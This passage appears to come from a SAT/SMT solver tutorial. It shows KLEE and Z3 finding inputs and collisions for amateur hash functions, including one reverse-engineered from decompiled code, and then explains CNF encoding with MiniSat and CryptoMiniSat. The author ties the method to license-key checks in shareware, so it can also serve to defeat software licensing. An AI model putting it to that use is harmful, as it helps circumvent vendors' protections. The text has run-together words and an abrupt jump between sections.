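    assert ((x + 0x1234) + 0x5678) & MASK == (x + (0x1234 + 0x5678)) & MASK
    # any chain of rotations is a single rotation:
    assert rol(rol(x, 7), 9) == rol(x, 16)
print("all reductions hold")
```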
Even worse: some people think that XORing a value several times can be better, like (x ^ 1234) ^ 5678. Obviously, these two XOR operations (or, more precisely, any number of them) can be reduced to a single one. The same story applies to chained operations like addition and subtraction: they can all be reduced to a single one as well. Real crypto algorithms, like IDEA, use several operations from different groups, like XOR, addition and multiplication. Applying them all in a specific order makes the resulting expression irreducible.

When I prepared this part, I tried to make an example of such an amateur hash function:

// copypasted from http://blog.regehr.org/archives/1063
uint32_t rotl32b (uint32_t x, uint32_t n)
{
	assert (n<32);
	if (!n) return x;
	return (x<<n) | (x>>(32-n));
}

uint32_t rotr32b (uint32_t x, uint32_t n)
{
	assert (n<32);
	if (!n) return x;
	return (x>>n) | (x<<(32-n));
}

void megahash (uint32_t buf[4])
{
	for (int i=0; i<4; i++)
	{
		uint32_t t0=buf[0]^0x12345678^buf[1];
		uint32_t t1=buf[1]^0xabcdef01^buf[2];
		uint32_t t2=buf[2]^0x23456789^buf[3];
		uint32_t t3=buf[3]^0x0abcdef0^buf[0];

		buf[0]=rotl32b(t0, 1);
		buf[1]=rotr32b(t1, 2);
		buf[2]=rotl32b(t2, 3);
		buf[3]=rotr32b(t3, 4);
	};
};

int main()
{
	uint32_t buf[4];

	klee_make_symbolic(buf, sizeof buf);

	megahash (buf);

	if (buf[0]==0x18f71ce6 // or whatever
		&& buf[1]==0xf37c2fc9
		&& buf[2]==0x1cfe96fe
		&& buf[3]==0x8c02c75e)
		klee_assert(0);
};

KLEE can break it with little effort. Functions of such complexity are common in shareware which checks license keys, etc.
Here is how we can make its work harder, by making the rotations dependent on the inputs; this makes the number of possible inputs much, much bigger:

void megahash (uint32_t buf[4])
{
	for (int i=0; i<16; i++)
	{
		uint32_t t0=buf[0]^0x12345678^buf[1];
		uint32_t t1=buf[1]^0xabcdef01^buf[2];
		uint32_t t2=buf[2]^0x23456789^buf[3];
		uint32_t t3=buf[3]^0x0abcdef0^buf[0];

		buf[0]=rotl32b(t0, t1&0x1F);
		buf[1]=rotr32b(t1, t2&0x1F);
		buf[2]=rotl32b(t2, t3&0x1F);
		buf[3]=rotr32b(t3, t0&0x1F);
	};
};

Addition (or modular addition, as cryptographers say) can make things even harder:

void megahash (uint32_t buf[4])
{
	for (int i=0; i<4; i++)
	{
		uint32_t t0=buf[0]^0x12345678^buf[1];
		uint32_t t1=buf[1]^0xabcdef01^buf[2];
		uint32_t t2=buf[2]^0x23456789^buf[3];
		uint32_t t3=buf[3]^0x0abcdef0^buf[0];

		buf[0]=rotl32b(t0, t2&0x1F)+t1;
		buf[1]=rotr32b(t1, t3&0x1F)+t2;
		buf[2]=rotl32b(t2, t1&0x1F)+t3;
		buf[3]=rotr32b(t3, t2&0x1F)+t0;
	};
};

As an exercise, you can try to make a block cipher which KLEE wouldn't break. This is quite a sobering experience. But even if you can, this is not a panacea: there is an array of other cryptanalytic methods to break it.

Summary: if you deal with amateur cryptography, you can always give KLEE and an SMT solver a try. Even more: sometimes you have only the decryption function, and if the algorithm is simple enough, KLEE or an SMT solver can reverse things back.

One fun thing to mention: if you try to implement an amateur crypto algorithm in Verilog/VHDL to run it on an FPGA, maybe in a brute-force way, you may find that EDA tools can optimize many things during synthesis (this is the word they use for "compilation") and leave the crypto algorithm much smaller/simpler than it was. Even if you try to implement the DES algorithm in bare metal with a fixed key, Altera Quartus can optimize the first round of it and make it smaller than the others.

10.2.1 Bugs

Another prominent feature of amateur cryptography is bugs. Bugs here are often left uncaught, because the output of the encrypting function visually looked "good enough" or "obfuscated enough", so the developer stopped working on it.
This is especially a feature of hash functions: when you work on a block cipher, you have to write two functions (encryption/decryption), while a hashing function is a single one.

The weirdest amateur encryption algorithm I ever saw encrypted only the odd bytes of the input block, while the even bytes were left untouched, so the input plaintext was partially visible in the resulting encrypted block. It was an encryption routine used in license key validation. It is hard to believe someone did this on purpose; most likely, it was just an unnoticed bug.

10.2.2 XOR ciphers

The simplest possible amateur cryptography is just the application of the XOR operation using some kind of table. Maybe even simpler. This is a real algorithm I once saw:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rcx=input;
	rdx=0x5D7E0D1F2E0F1F84;
	rax=rcx;
	rax*=rdx;
	rdx=0x388D76AEE8CB1500;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=rdx;
	rdx=0xD2E9EE7E83C4285B;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+rdx;
	rdx=0x8888888888888889;
	rax=r8;
	rax*=rdx;
	// RDX here is a high part of multiplication result
	rdx=rdx>>5;
	// RDX here is division result!
	rax=rdx;
	rcx=r8+rdx*4;
	rax=rax<<6;
	rcx=rcx-rax;
	rax=r8;
	rax=_lrotl (rax, rcx&0xFF); // rotate left
	return rax;
};

(This example was also used by Murphy Berzish in his lecture about SAT and SMT: http://mirror.csclub.uwaterloo.ca/csclub/mtrberzi-sat-smt-slides.pdf, http://mirror.csclub.uwaterloo.ca/csclub/mtrberzi-sat-smt.mp4.)

If you are careful enough, this code can be compiled and will even work in the same way as the original. Then we are going to rewrite it gradually, keeping in mind all the register usage. Attention and focus are very important here: any tiny typo may ruin all your work!

Here is the first step:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rcx=input;
	rdx=0x5D7E0D1F2E0F1F84;
	rax=rcx;
	rax*=rdx;
	rdx=0x388D76AEE8CB1500;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=rdx;
	rdx=0xD2E9EE7E83C4285B;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+rdx;
	rdx=0x8888888888888889;
	rax=r8;
	rax*=rdx;
	// RDX here is a high part of multiplication result
	rdx=rdx>>5;
	// RDX here is division result!
	rax=rdx;
	rcx=r8+rdx*4;
	rax=rax<<6;
	rcx=rcx-rax;
	rax=r8;
	rax=_lrotl (rax, rcx&0xFF); // rotate left
	return rax;
};

Next step:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rcx=input;
	rdx=0x5D7E0D1F2E0F1F84;
	rax=rcx;
	rax*=rdx;
	rdx=0x388D76AEE8CB1500;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=rdx;
	rdx=0xD2E9EE7E83C4285B;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+rdx;
	rdx=0x8888888888888889;
	rax=r8;
	rax*=rdx;
	// RDX here is a high part of multiplication result
	rdx=rdx>>5;
	// RDX here is division result!
	rax=rdx;
	rcx=(r8+rdx*4)-(rax<<6);
	rax=r8;
	rax=_lrotl (rax, rcx&0xFF); // rotate left
	return rax;
};

We can spot division implemented via multiplication. Indeed, let's calculate the divisor in Wolfram Mathematica:

Listing 1: Wolfram Mathematica
In[1]:=N[2^(64 + 5)/16^^8888888888888889]
Out[1]:=60.

We get this:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rcx=input;
	rdx=0x5D7E0D1F2E0F1F84;
	rax=rcx;
	rax*=rdx;
	rdx=0x388D76AEE8CB1500;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=rdx;
	rdx=0xD2E9EE7E83C4285B;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+rdx;
	rax=rdx=r8/60;
	rcx=(r8+rax*4)-(rax*64);
	rax=r8;
	rax=_lrotl (rax, rcx&0xFF); // rotate left
	return rax;
};

One more step:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rax=input;
	rax*=0x5D7E0D1F2E0F1F84;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=0x388D76AEE8CB1500;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+0xD2E9EE7E83C4285B;
	rcx=r8-(r8/60)*60;
	rax=r8;
	rax=_lrotl (rax, rcx&0xFF); // rotate left
	return rax;
};

By simple reduction, we finally see that it's calculating the remainder, not the quotient:

uint64_t f(uint64_t input)
{
	uint64_t rax, rbx, rcx, rdx, r8;

	rax=input;
	rax*=0x5D7E0D1F2E0F1F84;
	rax=_lrotr(rax, rax&0xF); // rotate right
	rax^=0x388D76AEE8CB1500;
	rax=_lrotl(rax, rax&0xF); // rotate left
	r8=rax+0xD2E9EE7E83C4285B;
	return _lrotl (r8, r8 % 60); // rotate left
};

We end up with this fancy formatted source code:

#include <stdio.h>
#include <stdint.h>

#define C1 0x5D7E0D1F2E0F1F84
#define C2 0x388D76AEE8CB1500
#define C3 0xD2E9EE7E83C4285B

uint64_t hash(uint64_t v)
{
	v*=C1;
	v=_lrotr(v, v&0xF); // rotate right
	v^=C2;
	v=_lrotl(v, v&0xF); // rotate left
	v+=C3;
	v=_lrotl(v, v % 60); // rotate left
	return v;
};

int main()
{
	printf ("%llu\n", hash(...));
};

Since we are not cryptanalysts, we can't find an easy way to generate an input value for some specific output value. The rotate instruction's coefficients look frightening: it's a warranty that the function is not bijective; it has collisions, or, putting it more simply, many inputs may be possible for one output. Brute force is not a solution, because the values are 64-bit ones: that's beyond reality.

10.3.2 Now let's use Z3

Still, without any special cryptographic knowledge, we may try to break this algorithm using Z3. Here is the Python source code:

 1 #!/usr/bin/env python
 2
 3 from z3 import *
 4
 5 C1=0x5D7E0D1F2E0F1F84
 6 C2=0x388D76AEE8CB1500
 7 C3=0xD2E9EE7E83C4285B
 8
 9 inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 print s.check()
22 m=s.model()
23 print m
24 print (" inp=0x%X" % m[inp].as_long())
25 print ("outp=0x%X" % m[outp].as_long())

This is going to be our first solver. We see the variable definitions on line 9: these are just 64-bit variables. i1..i6 are intermediate variables, representing the values in the registers between instruction executions. Then we add the so-called constraints on lines 12..17. The constraint on line 19 is the most important one: we are going to try to find an input value for which our algorithm produces 10816636949158156260. RotateRight, RotateLeft and URem are functions from the Z3 Python API, not related to the Python language itself.
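Before running the solver, the recovered algorithm can also be cross-checked with a plain Python model (a sketch: the rotate helpers are written by hand, with explicit 64-bit wraparound). One collision is visible without any solver at all: C1 is an even constant, so the input's top bit is destroyed by the multiplication modulo 2^64, and h(x) == h(x ^ 2^63) holds for every x:

```python
# Plain-Python model of the reconstructed hash function above.
C1 = 0x5D7E0D1F2E0F1F84
C2 = 0x388D76AEE8CB1500
C3 = 0xD2E9EE7E83C4285B
M64 = (1 << 64) - 1

def rol64(x, n):
    n %= 64
    return ((x << n) | (x >> (64 - n))) & M64

def ror64(x, n):
    n %= 64
    return ((x >> n) | (x << (64 - n))) & M64

def h(v):
    v = (v * C1) & M64
    v = ror64(v, v & 0xF)   # _lrotr(v, v&0xF)
    v ^= C2
    v = rol64(v, v & 0xF)   # _lrotl(v, v&0xF)
    v = (v + C3) & M64
    return rol64(v, v % 60)

# C1 is even, so flipping the top input bit never changes v*C1 mod 2^64:
x = 0x12EE577B63E80B73
assert h(x) == h(x ^ (1 << 63))
```

Note that 0x12EE577B63E80B73 and 0x12EE577B63E80B73 ^ 2^63 = 0x92EE577B63E80B73 are exactly the first two preimages the solver finds below, so the multiplication alone already accounts for some of the collisions.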
Then we run it:

...>python.exe 1.py
sat
[i1 = 3959740824832824396,
 i3 = 8957124831728646493,
 i5 = 10816636949158156260,
 inp = 1364123924608584563,
 outp = 10816636949158156260,
 i4 = 14065440378185297801,
 i2 = 4954926323707358301]
 inp=0x12EE577B63E80B73
outp=0x961C69FF0AEFD7E4

"sat" means "satisfiable", i.e., the solver was able to find at least one solution. The solution is printed in the square brackets; the last two lines are the input/output pair in hexadecimal form. Yes, indeed, if we run our function with 0x12EE577B63E80B73 as input, the algorithm produces the value we were looking for.

But, as we noticed before, the function we are working with is not bijective, so there may be other correct input values. Z3 is not capable of producing more than one result at once, but let's hack our example slightly by adding line 21, which implies "look for any result other than this one":

 1 #!/usr/bin/env python
 2
 3 from z3 import *
 4
 5 C1=0x5D7E0D1F2E0F1F84
 6 C2=0x388D76AEE8CB1500
 7 C3=0xD2E9EE7E83C4285B
 8
 9 inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 s.add(inp!=0x12EE577B63E80B73)
22
23 print s.check()
24 m=s.model()
25 print m
26 print (" inp=0x%X" % m[inp].as_long())
27 print ("outp=0x%X" % m[outp].as_long())

Indeed, it finds another correct result:

...>python.exe 2.py
sat
[i1 = 3959740824832824396,
 i3 = 8957124831728646493,
 i5 = 10816636949158156260,
 inp = 10587495961463360371,
 outp = 10816636949158156260,
 i4 = 14065440378185297801,
 i2 = 4954926323707358301]
 inp=0x92EE577B63E80B73
outp=0x961C69FF0AEFD7E4

This can be automated: each found result can be added as a constraint, and then the next result is searched for.
Here is a slightly more sophisticated example:

 1 #!/usr/bin/env python
 2
 3 from z3 import *
 4
 5 C1=0x5D7E0D1F2E0F1F84
 6 C2=0x388D76AEE8CB1500
 7 C3=0xD2E9EE7E83C4285B
 8
 9 inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64)
10
11 s = Solver()
12 s.add(i1==inp*C1)
13 s.add(i2==RotateRight (i1, i1 & 0xF))
14 s.add(i3==i2 ^ C2)
15 s.add(i4==RotateLeft(i3, i3 & 0xF))
16 s.add(i5==i4 + C3)
17 s.add(outp==RotateLeft (i5, URem(i5, 60)))
18
19 s.add(outp==10816636949158156260)
20
21 # copypasted from http://stackoverflow.com/questions/11867611/z3py-checking-all-solutions-for-equation
22 result=[]
23 while True:
24     if s.check() == sat:
25         m = s.model()
26         print m[inp]
27         result.append(m)
28         # Create a new constraint that blocks the current model
29         block = []
30         for d in m:
31             # d is a declaration
32             if d.arity() > 0:
33                 raise Z3Exception("uninterpreted functions are not supported")
34             # create a constant from declaration
35             c=d()
36             if is_array(c) or c.sort().kind() == Z3_UNINTERPRETED_SORT:
37                 raise Z3Exception("arrays and uninterpreted sorts are not supported")
38             block.append(c != m[d])
39         s.add(Or(block))
40     else:
41         print "results total=",len(result)
42         break

We got:

1364123924608584563
1234567890
9223372038089343698
4611686019661955794
13835058056516731602
3096040143925676201
12319412180780452009
7707726162353064105
16931098199207839913
1906652839273745429
11130024876128521237
15741710894555909141
6518338857701133333
5975809943035972467
15199181979890748275
10587495961463360371
results total= 16

So there are 16 correct input values which all produce 10816636949158156260 as a result. The second one is 1234567890: it is indeed the value I originally used while preparing this example.

Let's also try to research our algorithm a bit more. Acting on a sadistic whim, let's find out whether there are any possible input/output pairs in which the lower 32-bit parts are equal to each other.
Let’sremovethe outpconstraintandaddanother,atline17: 1#!/usr/bin/env python 2 3from z3 import * 4 5C1=0x5D7E0D1F2E0F1F84 6C2=0x388D76AEE8CB1500 7C3=0xD2E9EE7E83C4285B 8 9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64) 10 11 s = Solver() 12 s.add(i1==inp*C1) 13 s.add(i2==RotateRight (i1, i1 & 0xF)) 14 s.add(i3==i2 ^ C2) 15 s.add(i4==RotateLeft(i3, i3 & 0xF)) 16 s.add(i5==i4 + C3) 17 s.add(outp==RotateLeft (i5, URem(i5, 60))) 18 19 s.add(outp & 0xFFFFFFFF == inp & 0xFFFFFFFF) 20 21 print s.check() 22 m=s.model() 23 print m 24 print (" inp=0x%X" % m[inp].as_long()) 25 print ("outp=0x%X" % m[outp].as_long()) Itisindeedso: 122 sat [i1 = 14869545517796235860, i3 = 8388171335828825253, i5 = 6918262285561543945, inp = 1370377541658871093, outp = 14543180351754208565, i4 = 10167065714588685486, i2 = 5541032613289652645] inp=0x13048F1D12C00535 outp=0xC9D3C17A12C00535 Let’sbemoresadisticandaddanotherconstraint: last16bitsmustbe 0x1234: 1#!/usr/bin/env python 2 3from z3 import * 4 5C1=0x5D7E0D1F2E0F1F84 6C2=0x388D76AEE8CB1500 7C3=0xD2E9EE7E83C4285B 8 9inp, i1, i2, i3, i4, i5, i6, outp = BitVecs('inp i1 i2 i3 i4 i5 i6 outp', 64) 10 11 s = Solver() 12 s.add(i1==inp*C1) 13 s.add(i2==RotateRight (i1, i1 & 0xF)) 14 s.add(i3==i2 ^ C2) 15 s.add(i4==RotateLeft(i3, i3 & 0xF)) 16 s.add(i5==i4 + C3) 17 s.add(outp==RotateLeft (i5, URem(i5, 60))) 18 19 s.add(outp & 0xFFFFFFFF == inp & 0xFFFFFFFF) 20 s.add(outp & 0xFFFF == 0x1234) 21 22 print s.check() 23 m=s.model() 24 print m 25 print (" inp=0x%X" % m[inp].as_long()) 26 print ("outp=0x%X" % m[outp].as_long()) Ohyes,thispossibleaswell: sat [i1 = 2834222860503985872, i3 = 2294680776671411152, i5 = 17492621421353821227, inp = 461881484695179828, outp = 419247225543463476, i4 = 2294680776671411152, i2 = 2834222860503985872] inp=0x668EEC35F961234 outp=0x5D177215F961234 Z3worksveryfastanditimpliesthatthealgorithmisweak,itisnotcryptographicatall(likethemostof theamateurcryptography). 11SAT-solvers SMTvs. 
SAT is like a high-level PL vs. assembly language: the latter can be much more efficient, but it is harder to program in.

11.1 CNF form

CNF (conjunctive normal form, https://en.wikipedia.org/wiki/Conjunctive_normal_form) is a normal form. Any boolean expression can be converted to a normal form, and CNF is one of them. A CNF expression is a bunch of clauses (sub-expressions) consisting of terms (variables), ORs and NOTs, all of which are then glued together with AND into a full expression. There is a way to memorize it: CNF is "AND of ORs" (or "product of sums"), while DNF (disjunctive normal form) is "OR of ANDs" (or "sum of products").

An example: (¬A ∨ B) ∧ (C ∨ ¬D).

∨ stands for OR (logical disjunction, https://en.wikipedia.org/wiki/Logical_disjunction); the "+" sign is also sometimes used for OR. ∧ stands for AND (logical conjunction, https://en.wikipedia.org/wiki/Logical_conjunction); it is easy to memorize, because ∧ looks like the letter "A". The "·" sign is also sometimes used for AND. ¬ is negation (NOT).

11.2 Example: 2-bit adder

A SAT solver is merely a solver of huge boolean equations in CNF form. It just gives the answer: whether there is a set of input values which can satisfy the CNF expression, and what those input values must be.

Here is a 2-bit adder, for example:

Figure 9: 2-bit adder circuit

The adder is in its simplest form: it has no carry-in and carry-out, and it consists of 3 XOR gates and one AND gate. Let's try to figure out which sets of input values will force the adder to set both output bits. By a quick mental calculation, we can see that there are 4 ways to do so: 0+3=3, 1+2=3, 2+1=3, 3+0=3. Here is also the truth table, with these rows marked by asterisks:

                   aH aL bH bL | qH qL
   3+3=6  2(mod4)   1  1  1  1 |  1  0
   3+2=5  1(mod4)   1  1  1  0 |  0  1
   3+1=4  0(mod4)   1  1  0  1 |  0  0
 * 3+0=3  3(mod4)   1  1  0  0 |  1  1
   2+3=5  1(mod4)   1  0  1  1 |  0  1
   2+2=4  0(mod4)   1  0  1  0 |  0  0
 * 2+1=3  3(mod4)   1  0  0  1 |  1  1
   2+0=2  2(mod4)   1  0  0  0 |  1  0
   1+3=4  0(mod4)   0  1  1  1 |  0  0
 * 1+2=3  3(mod4)   0  1  1  0 |  1  1
   1+1=2  2(mod4)   0  1  0  1 |  1  0
   1+0=1  1(mod4)   0  1  0  0 |  0  1
 * 0+3=3  3(mod4)   0  0  1  1 |  1  1
   0+2=2  2(mod4)   0  0  1  0 |  1  0
   0+1=1  1(mod4)   0  0  0  1 |  0  1
   0+0=0  0(mod4)   0  0  0  0 |  0  0

Let's find what a SAT solver can say about it. First, we should represent our 2-bit adder as a CNF expression.
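The hand count above can be confirmed by brute force in a few lines (a sketch; the bit naming follows the truth table):

```python
from itertools import product

# Enumerate all 2-bit additions and keep those where both output bits are set,
# i.e. (a + b) mod 4 == 3.
hits = [(a, b) for a, b in product(range(4), repeat=2) if (a + b) & 3 == 3]
assert hits == [(0, 3), (1, 2), (2, 1), (3, 0)]

# The same condition expressed over individual bits, as in the circuit:
# qL = aL xor bL; qH = aH xor bH xor (aL and bL).
def both_bits_set(aH, aL, bH, bL):
    qL = aL ^ bL
    qH = aH ^ bH ^ (aL & bL)
    return qH == 1 and qL == 1

count = sum(both_bits_set(*bits) for bits in product((0, 1), repeat=4))
assert count == 4
print("4 ways, as expected")
```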
Using Wolfram Mathematica, we can express boolean expressions for both adder outputs:

In[]:=AdderQ0[aL_,bL_]=Xor[aL,bL]
Out[]:=aL ⊻ bL

In[]:=AdderQ1[aL_,aH_,bL_,bH_]=Xor[And[aL,bL],Xor[aH,bH]]
Out[]:=aH ⊻ bH ⊻ (aL && bL)

We need an expression for which both parts generate 1's. Let's use Wolfram Mathematica to find all instances of such an expression (I glued both parts together with And):

In[]:=Boole[SatisfiabilityInstances[And[AdderQ0[aL,bL],AdderQ1[aL,aH,bL,bH]],{aL,aH,bL,bH},4]]
Out[]:={1,1,0,0},{1,0,0,1},{0,1,1,0},{0,0,1,1}

Yes, indeed, Mathematica says there are 4 inputs which lead to the result we need; so Mathematica can also be used as a SAT solver. Nevertheless, let's proceed to CNF form. Using Mathematica again, let's convert our expression to CNF:

In[]:=cnf=BooleanConvert[And[AdderQ0[aL,bL],AdderQ1[aL,aH,bL,bH]],"CNF"]
Out[]:=(!aH ∥ !bH) && (aH ∥ bH) && (!aL ∥ !bL) && (aL ∥ bL)

It looks more complex. The reason for such verbosity is that CNF form doesn't allow XOR operations.

11.2.1 MiniSat

For starters, we can try MiniSat (http://minisat.se/MiniSat.html). The standard way to encode a CNF expression for MiniSat is to enumerate all the OR parts, one per line. Also, MiniSat doesn't support variable names, just numbers. Let's enumerate our variables: 1 will be aH, 2 – aL, 3 – bH, 4 – bL.

Here is what I got when I converted the Mathematica expression into the MiniSat input file:

p cnf 4 4
-1 -3 0
1 3 0
-2 -4 0
2 4 0

The two 4's on the first line are the number of variables and the number of clauses, respectively. Then there are 4 lines, one for each OR clause. A minus before a variable number means that the variable is negated; the absence of a minus means it is not negated. The zero at the end is just a terminating zero, meaning the end of the clause. In other words, each line is an OR clause with optional negations, and the task of MiniSat is to find a set of inputs which can satisfy all lines in the input file.
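The DIMACS format just described is simple enough that a toy brute-force checker fits in a few lines of Python (a sketch with hypothetical helper names; feasible only for a handful of variables, which is precisely the regime where a real SAT solver is unnecessary):

```python
from itertools import product

def parse_dimacs(text):
    """Parse DIMACS CNF: skip 'c'/'p' lines; each clause ends with 0."""
    clauses = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "cp":
            continue
        lits = [int(t) for t in line.split()]
        assert lits[-1] == 0   # terminating zero
        clauses.append(lits[:-1])
    return clauses

def all_solutions(clauses, nvars):
    # literal v is true iff bits[v-1]; literal -v is true iff not bits[v-1]
    for bits in product((False, True), repeat=nvars):
        if all(any(bits[abs(l) - 1] == (l > 0) for l in c) for c in clauses):
            yield bits

adder_cnf = """p cnf 4 4
-1 -3 0
1 3 0
-2 -4 0
2 4 0
"""
sols = list(all_solutions(parse_dimacs(adder_cnf), 4))
assert len(sols) == 4   # matches the truth table: aH != bH and aL != bL
```

The four clauses encode exactly aH ≠ bH and aL ≠ bL, so 2·2 = 4 assignments survive; the enumeration-by-blocking trick shown next with MiniSat recovers the same four, one at a time.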
I named that file adder.cnf; now let's try MiniSat:

% minisat -verb=0 adder.cnf results.txt
SATISFIABLE

The results are in the results.txt file:

SAT
-1 -2 3 4 0

This means that if the first two variables (aH and aL) are false, and the last two variables (bH and bL) are set to true, the whole CNF expression is satisfiable. This seems to be true: if bH and bL are the only inputs set to true, both resulting bits are also in the true state.

Now, how do we get the other instances? SAT solvers, like SMT solvers, produce only one solution (or instance). MiniSat uses a PRNG, and its initial seed can be set explicitly; I tried different values, but the result is still the same. Nevertheless, CryptoMiniSat was in this case able to show all 4 possible instances, though in chaotic order. So this is not a very robust way. Perhaps the only known way is to negate the solution clause and add it to the input expression. We've got -1 -2 3 4; now we negate all the values in it (just toggle the minuses: 1 2 -3 -4) and add it to the end of the input file:

p cnf 4 5
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4 0

Now we've got another result:

SAT
1 2 -3 -4 0

This means aH and aL must both be true, and bH and bL must be false, to satisfy the input expression. Let's negate this clause and add it again:

p cnf 4 6
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4 0
-1 -2 3 4 0

The result is:

SAT
-1 2 3 -4 0

aH=false, aL=true, bH=true, bL=false. This is also correct, according to our truth table. Let's add it again:

p cnf 4 7
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4 0
-1 -2 3 4 0
1 -2 -3 4 0

SAT
1 -2 -3 4 0

aH=true, aL=false, bH=false, bL=true. This is also correct. This is the fourth result, and there shouldn't be more. What if we add it anyway?

p cnf 4 8
-1 -3 0
1 3 0
-2 -4 0
2 4 0
1 2 -3 -4 0
-1 -2 3 4 0
1 -2 -3 4 0
-1 2 3 -4 0

Now MiniSat just says "UNSATISFIABLE", without any additional information in the resulting file. Our example is tiny, but MiniSat can work with huge CNF expressions.

11.2.2 CryptoMiniSat

The XOR operation is absent in CNF form, but crucial in cryptographic algorithms.
The simplest possible way to represent a single XOR operation in CNF form is (¬x ∨ ¬y) ∧ (x ∨ y); not that small an expression, though many XOR operations in a single expression can be optimized better.

One significant difference between MiniSat and CryptoMiniSat is that the latter supports clauses with XOR operations instead of ORs, because CryptoMiniSat aims to analyze crypto algorithms (http://www.msoos.org/xor-clauses/). XOR clauses are handled by CryptoMiniSat in a special way, without translating them to OR clauses. You just need to prepend a clause with "x" in the CNF file, and the OR clause is then treated as an XOR clause by CryptoMiniSat. As for the 2-bit adder, this smallest possible XOR-CNF expression can be used to find all inputs where both output adder bits are set:

(aH ⊕ bH) ∧ (aL ⊕ bL)

This is the .cnf file for CryptoMiniSat:

p cnf 4 2
x1 3 0
x2 4 0

Now I run CryptoMiniSat with various random values to initialize its PRNG...

% cryptominisat4 --verb 0 --random 0 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
% cryptominisat4 --verb 0 --random 1 XOR_adder.cnf
s SATISFIABLE
v -1 -2 3 4 0
% cryptominisat4 --verb 0 --random 2 XOR_adder.cnf
s SATISFIABLE
v 1 -2 -3 4 0
% cryptominisat4 --verb 0 --random 3 XOR_adder.cnf
s SATISFIABLE
v 1 2 -3 -4 0
% cryptominisat4 --verb 0 --random 4 XOR_adder.cnf
s SATISFIABLE
v -1 2 3 -4 0
% cryptominisat4 --verb 0 --random 5 XOR_adder.cnf
s SATISFIABLE
v -1 2 3 -4 0
% cryptominisat4 --verb 0 --random 6 XOR_adder.cnf
s SATISFIABLE
Thiswillbeafunction,returning Trueif anyof2bitsof8inputsbitsare Trueandothersare False. First,wemaketruthtableofsuchfunction: In[]:= tbl2 = Table[PadLeft[IntegerDigits[i, 2], 8] -> If[Equal[DigitCount[i, 2][[1]], 2], 1, 0], {i, 0, 255}] Out[]= {{0, 0, 0, 0, 0, 0, 0, 0} -> 0, {0, 0, 0, 0, 0, 0, 0, 1} -> 0, {0, 0, 0, 0, 0, 0, 1, 0} -> 0, {0, 0, 0, 0, 0, 0, 1, 1} -> 1, {0, 0, 0, 0, 0, 1, 0, 0} -> 0, {0, 0, 0, 0, 0, 1, 0, 1} -> 1, {0, 0, 0, 0, 0, 1, 1, 0} -> 1, {0, 0, 0, 0, 0, 1, 1, 1} -> 0, {0, 0, 0, 0, 1, 0, 0, 0} -> 0, {0, 0, 0, 0, 1, 0, 0, 1} -> 1, {0, 0, 0, 0, 1, 0, 1, 0} -> 1, {0, 0, 0, 0, 1, 0, 1, 1} -> 0, ... {1, 1, 1, 1, 1, 0, 1, 0} -> 0, {1, 1, 1, 1, 1, 0, 1, 1} -> 0, {1, 1, 1, 1, 1, 1, 0, 0} -> 0, {1, 1, 1, 1, 1, 1, 0, 1} -> 0, {1, 1, 1, 1, 1, 1, 1, 0} -> 0, {1, 1, 1, 1, 1, 1, 1, 1} -> 0} Nowwecanmake CNFexpressionusingthistruthtable: In[]:= BooleanConvert[ BooleanFunction[tbl2, {a, b, c, d, e, f, g, h}], "CNF"] Out[]= (! a || ! b || ! c) && (! a || ! b || ! d) && (! a || ! b || ! e) && (! a || ! b || ! f) && (! a || ! b || ! g) && (! a || ! b || ! h) && (! a || ! c || ! d) && (! a || ! c || ! e) && (! a || ! c || ! f) && (! a || ! c || ! g) && (! a || ! c || ! h) && (! a || ! d || ! e) && (! a || ! d || ! f) && (! a || ! d || ! g) && (! a || ! d || ! h) && (! a || ! e || ! f) && (! a || ! e || ! g) && (! a || ! e || ! h) && (! a || ! f || ! g) && (! a || ! f || ! h) && (! a || ! g || ! h) && (a || b || c || d || e || f || g) && (a || b || c || d || e || f || h) && (a || b || c || d || e || g || h) && (a || b || c || d || f || g || h) && (a || b || c || e || f || g || h) && (a || b || d || e || f || g || h) && (a || c || d || e || f || g || h) && (! b || ! c || ! d) && (! b || ! c || ! e) && (! b || ! c || ! f) && (! b || ! c || ! g) && (! b || ! c || ! h) && (! b || ! d || ! e) && (! b || ! d || ! f) && (! b || ! d || ! g) && (! b || ! d || ! h) && (! b || ! e || 